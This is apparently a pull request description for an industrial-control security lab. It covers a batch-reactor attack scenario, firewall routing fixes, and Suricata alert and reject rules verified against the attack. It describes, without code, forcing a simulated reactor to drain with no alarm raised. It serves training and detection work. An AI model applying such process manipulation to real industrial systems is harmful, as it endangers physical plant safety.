- `attack-base`'s always-on `plc_init.py` baseline-seeder defaults to `PLC_IP=10.200.10.10` when unset — moved the batch controller off that IP (and updated `batch_attack.py`'s own default to match) to avoid its command coils/state register being silently overwritten with Lab01-specific values on container boot.
- Confirmed the platform's "route-replace" firewall architecture means an `extraNetworks`-attached attack machine still routes OT-bound traffic through the firewall container's gateway — the full stack (including `firewall-1`) must be running, not just the attacked devices.
- SID 9000030 (one of two pre-loaded baseline Suricata rules) has a 5-hits/10s threshold and does not fire from a single attack run as originally written — corrected the tutorial text and added a loop command so students can trigger it deliberately.
- Confirmed both a custom alert rule and reject rule work correctly against this attack — the reject rule produced a genuine "Connection reset by peer" from the attacker's own point of view.

## Test plan
No `tsc`/`vitest` gate applies (scenario content + one attack script, no orchestrator/schema/UI changes). Instead, fully live-verified:
- [x] Normal batch lifecycle timing (CHARGE→HEAT→REACT) matches the configured recipe math exactly
- [x] Attack executed from inside the real `attack-1` container via the actual routing path — `current_phase` forced to DISCHARGE, reactor genuinely drained (0.30m→0.03m), `batch_state` reached COMPLETE with no alarm
- [x] Baseline Suricata rule SID 9000001 fires on the single attack; SID 9000030 fires after a 5x loop
- [x] Custom alert rule (SID 9100001) and reject rule (SID 9100002) both verified working — reject produced a real connection reset, not just a logged block

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>